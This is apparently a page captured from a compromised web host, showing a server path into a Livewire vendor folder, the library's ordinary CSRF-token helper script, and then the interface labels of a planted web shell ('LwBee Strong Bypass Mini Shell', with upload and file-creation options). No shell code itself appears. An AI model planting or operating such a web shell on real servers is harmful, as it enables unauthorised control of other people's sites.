/home/storage/f/3f/a5/aloic1/public_html/core/vendor/livewire/livewire/js/util/getCsrfToken.js
export function getCsrfToken() {
    const tokenTag = document.head.querySelector('meta[name="csrf-token"]')

    if (tokenTag) {
        return tokenTag.content
    }

    return window.livewire_token ?? undefined
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File